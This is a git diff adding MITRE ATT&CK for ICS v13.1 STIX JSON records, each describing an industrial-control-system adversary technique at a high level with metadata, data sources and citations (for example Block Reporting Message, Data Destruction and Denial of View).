@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--7a0d17a9-bef3-48a7-a33e-cae0ef517ab2", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Automated Collection", + "description": "Adversaries may automate collection of industrial environment information using tools or scripts. This automated collection may leverage native control protocols and tools available in the control systems environment. For example, the OPC protocol may be used to enumerate and gather information. Access to a system or interface with these native protocols may allow collection and enumeration of other attached, communicating servers and devices.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Control Server" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Script: Script Execution", + "Network Traffic: Network Traffic Content", + "File: File Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0802", + "external_id": "T0802" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b.json new file mode 100644 index 0000000000000000000000000000000000000000..a0dea8428f3319f63e5fe208c125cf81402fdae2 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b.json 
@@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--f6d16847-c988-4df9-ba31-13b7959c8889", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-19T13:57:23.538Z", + "name": "Block Reporting Message", + "description": "Adversaries may block or prevent a reporting message from reaching its intended target. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. By blocking these reporting messages, an adversary can potentially hide their actions from an operator.\n\nBlocking reporting messages in control systems that manage physical processes may contribute to system impact, causing inhibition of a response function. A control system may not be able to respond in a proper or timely manner to an event, such as a dangerous fault, if its corresponding reporting message is blocked. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Input/Output Server", + "Device Configuration/Parameters" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Flow", + "Process: Process Termination", + "Operational Databases: Process/Event Alarm", + "Operational Databases: Process History/Live Data" + ], + "type": "attack-pattern", + "id": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + 
"source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0804", + "external_id": "T0804" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + }, + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--40b300ba-f553-48bf-862e-9471b220d455.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--40b300ba-f553-48bf-862e-9471b220d455.json new file mode 100644 index 0000000000000000000000000000000000000000..d4aaa6850a3fe4a2a0e369c79872e1d12aa1248c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--40b300ba-f553-48bf-862e-9471b220d455.json 
@@ -0,0 +1,67 @@ +{ + "type": "bundle", + "id": "bundle--56e3ebbf-7eb3-498b-881c-793166934b3e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-05T14:16:02.811Z", + "name": "Unauthorized Command Message", + "description": "Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device's actions. An adversary could potentially instruct a control systems device to perform an action that will cause an [Impact](https://attack.mitre.org/tactics/TA0105). (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)\n\nIn the Dallas Siren incident, adversaries were able to send command messages to activate tornado alarm systems across the city without an impending tornado or other disaster. 
(Citation: Zack Whittaker April 2017) (Citation: Benjamin Freed March 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Application Log: Application Log Content", + "Operational Databases: Process/Event Alarm", + "Network Traffic: Network Traffic Content", + "Operational Databases: Process History/Live Data" + ], + "type": "attack-pattern", + "id": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0855", + "external_id": "T0855" + }, + { + "source_name": "Benjamin Freed March 2019", + "description": "Benjamin Freed 2019, March 13 Tornado sirens in Dallas suburbs deactivated after being hacked and set off Retrieved. 2020/11/06 ", + "url": "https://statescoop.com/tornado-sirens-in-dallas-suburbs-deactivated-after-being-hacked-and-set-off/" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + }, + { + "source_name": "Zack Whittaker April 2017", + "description": "Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 
2020/11/06 ", + "url": "https://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675.json new file mode 100644 index 0000000000000000000000000000000000000000..a8703c81480fcf46226ea6dc5e434842fb3c4fb5 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675.json 
@@ -0,0 +1,61 @@ +{ + "type": "bundle", + "id": "bundle--bd332482-b2a5-4c17-82d9-f624d1805650", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-19T14:12:22.878Z", + "name": "Data Destruction", + "description": "Adversaries may perform data destruction over the course of an operation. The adversary may drop or create malware, tools, or other non-native files on a target system to accomplish this, potentially leaving behind traces of malicious activities. Such non-native files and other data may be removed over the course of an intrusion to maintain a small footprint or as a standard part of the post-intrusion cleanup process. (Citation: Enterprise ATT&CK January 2018)\n\nData destruction may also be used to render operator interfaces unable to respond and to disrupt response functions from occurring as expected. An adversary may also destroy data backups that are vital to recovery after an incident.\n\nStandard file deletion commands are available on most operating system and device interfaces to perform cleanup, but adversaries may use other tools as well. 
Two examples are Windows Sysinternals SDelete and Active@ Killdisk.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "Control Server", + "Human-Machine Interface", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Matan Dobrushin - Otorio" + ], + "x_mitre_data_sources": [ + "File: File Deletion", + "File: File Modification", + "Command: Command Execution", + "Process: Process Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0809", + "external_id": "T0809" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 File Deletion Retrieved. 2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1107" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--4c2e1408-9d68-4187-8e6b-a77bc52700ec.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--4c2e1408-9d68-4187-8e6b-a77bc52700ec.json new file mode 100644 index 0000000000000000000000000000000000000000..9fd0802ccc9df06de4c1f2aa23d9fb31dce1cedd --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--4c2e1408-9d68-4187-8e6b-a77bc52700ec.json 
@@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--b1845aff-a0bf-4b99-895f-ef0d33972822", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Manipulation of View", + "description": "Adversaries may attempt to manipulate the information reported back to operators or controllers. This manipulation may be short term or sustained. During this time the process itself could be in a much different state than what is reported. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) \n\nOperators may be fooled into doing something that is harmful to the system in a loss of view situation. With a manipulated view into the systems, operators may issue inappropriate control sequences that introduce faults or catastrophic failures into the system. Business analysis systems can also be provided with inaccurate data leading to bad management decisions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Engineering Workstation", + "Human-Machine Interface", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--4c2e1408-9d68-4187-8e6b-a77bc52700ec", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0832", + "external_id": "T0832" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 
2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--50d3222f-7550-4a3c-94e1-78cb6c81d064.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--50d3222f-7550-4a3c-94e1-78cb6c81d064.json new file mode 100644 index 0000000000000000000000000000000000000000..8441e3c0ed8af98e5007a528a66af67c0401300c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--50d3222f-7550-4a3c-94e1-78cb6c81d064.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--09baf50c-8d59-4c7e-8229-1d4c6bb0b379", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Data Historian Compromise", + "description": "Adversaries may compromise and gain control of a data historian to gain a foothold into the control system environment. Access to a data historian may be used to learn stored database archival and analysis information on the control system. A dual-homed data historian may provide adversaries an interface from the IT environment to the OT environment. \n\nDragos has released an updated analysis on CrashOverride that outlines the attack from the ICS network breach to payload delivery and execution. (Citation: Industroyer - Dragos - 201810) The report summarized that CrashOverride represents a new application of malware, but relied on standard intrusion techniques. In particular, new artifacts include references to a Microsoft Windows Server 2003 host, with a SQL Server. Within the ICS environment, such a database server can act as a data historian. Dragos noted a device with this role should be \"expected to have extensive connections\" within the ICS environment. 
Adversary activity leveraged database capabilities to perform reconnaissance, including directory queries and network connectivity checks.\n\nPermissions Required: Administrator\n\nContributors: Joe Slowik - Dragos", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Joe Slowik - Dragos" + ], + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "id": "attack-pattern--50d3222f-7550-4a3c-94e1-78cb6c81d064", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0810", + "external_id": "T0810" + }, + { + "source_name": "Industroyer - Dragos - 201810", + "description": "Dragos. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved October 14, 2019.", + "url": "https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--539d0484-fe95-485a-b654-86991c0d0d00.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--539d0484-fe95-485a-b654-86991c0d0d00.json new file mode 100644 index 0000000000000000000000000000000000000000..d9a2dbea90f5624b193a967f86b315c0a4bdc297 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--539d0484-fe95-485a-b654-86991c0d0d00.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--104c8763-a3a0-47f3-a59a-8366a2355f2d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Network Service Scanning", + "description": "Network Service Scanning is the process of discovering services on networked systems. This can be achieved through a technique called port scanning or probing. Port scanning interacts with the TCP/IP ports on a target system to determine whether ports are open, closed, or filtered by a firewall. This does not reveal the service that is running behind the port, but since many common services are run on [https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml specific port numbers], the type of service can be assumed. More in-depth testing includes interaction with the actual service to determine the service type and specific version. One of the most-popular tools to use for Network Service Scanning is [https://nmap.org/ Nmap].\n\nAn adversary may attempt to gain information about a target device and its role on the network via Network Service Scanning techniques, such as port scanning. Network Service Scanning is useful for determining potential vulnerabilities in services on target devices. Network Service Scanning is closely tied to .\n\nScanning ports can be noisy on a network. In some attacks, adversaries probe for specific ports using custom tools. 
This was specifically seen in the Triton and PLC-Blaster attacks.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--539d0484-fe95-485a-b654-86991c0d0d00", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0841", + "external_id": "T0841" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805.json new file mode 100644 index 0000000000000000000000000000000000000000..22862bb3af4d214e2c33cc90e3f6f12fdbc291a6 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--d1797562-ffd4-47d2-9eb3-ffa812c27be3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Indicator Removal on Host", + "description": "Adversaries may attempt to remove indicators of their presence on a system in an effort to cover their tracks. In cases where an adversary may feel detection is imminent, they may try to overwrite, delete, or cover up changes they have made to the device.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Process: OS API Execution", + "File: File Metadata", + "Windows Registry: Windows Registry Key Deletion", + "File: File Modification", + "Command: Command Execution", + "Windows Registry: Windows Registry Key Modification", + "Process: Process Creation", + "File: File Deletion" + ], + "type": "attack-pattern", + "id": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0872", + "external_id": "T0872" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204.json new file mode 100644 index 0000000000000000000000000000000000000000..2d19ea2d8074c968003e8ccbdd800a809f785241 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204.json 
@@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--431176ba-d425-47d7-9f05-51d546b2ba62", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "I/O Image", + "description": "Adversaries may seek to capture process values related to the inputs and outputs of a PLC. During the scan cycle, a PLC reads the status of all inputs and stores them in an image table. (Citation: Nanjundaiah, Vaidyanath) The image table is the PLCs internal storage location where values of inputs/outputs for one scan are stored while it executes the user program. After the PLC has solved the entire logic program, it updates the output image table. The contents of this output image table are written to the corresponding output points in I/O Modules.\n\nThe Input and Output Image tables described above make up the I/O Image on a PLC. This image is used by the user program instead of directly interacting with physical I/O. (Citation: Spenneberg, Ralf 2016) \n\nAdversaries may collect the I/O Image state of a PLC by utilizing a devices [Native API](https://attack.mitre.org/techniques/T0834) to access the memory regions directly. 
The collection of the PLCs I/O state could be used to replace values or inform future stages of an attack.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Asset: Software" + ], + "type": "attack-pattern", + "id": "attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0877", + "external_id": "T0877" + }, + { + "source_name": "Nanjundaiah, Vaidyanath", + "description": "Nanjundaiah, Vaidyanath PLC Ladder Logic Basics Retrieved. 2021/10/11 ", + "url": "https://www.ezautomation.net/industry-articles/plc-ladder-logic-basics.htm" + }, + { + "source_name": "Spenneberg, Ralf 2016", + "description": "Spenneberg, Ralf 2016 PLC-Blaster Retrieved. 2019/06/06 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac.json new file mode 100644 index 0000000000000000000000000000000000000000..b1550c5d18d6f7d1e3a0387465d076a3972bad7e --- /dev/null 
+++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac.json 
@@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--4113ee5d-0eb1-4d5b-a51b-a72b1fc15b28", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:16:25.031Z", + "name": "Denial of View", + "description": "Adversaries may cause a denial of view in attempt to disrupt and prevent operator oversight on the status of an ICS environment. This may manifest itself as a temporary communication failure between a device and its control source, where the interface recovers and becomes available once the interference ceases. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) \n\nAn adversary may attempt to deny operator visibility by preventing them from receiving status and reporting messages. Denying this view may temporarily block and prevent operators from noticing a change in state or anomalous behavior. The environment's data and processes may still be operational, but functioning in an unintended or adversarial manner. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "id": "attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0815", + "external_id": "T0815" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. 
Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4.json new file mode 100644 index 0000000000000000000000000000000000000000..5c2b08822445760f0ca11cd18e422712295ccfdc --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4.json 
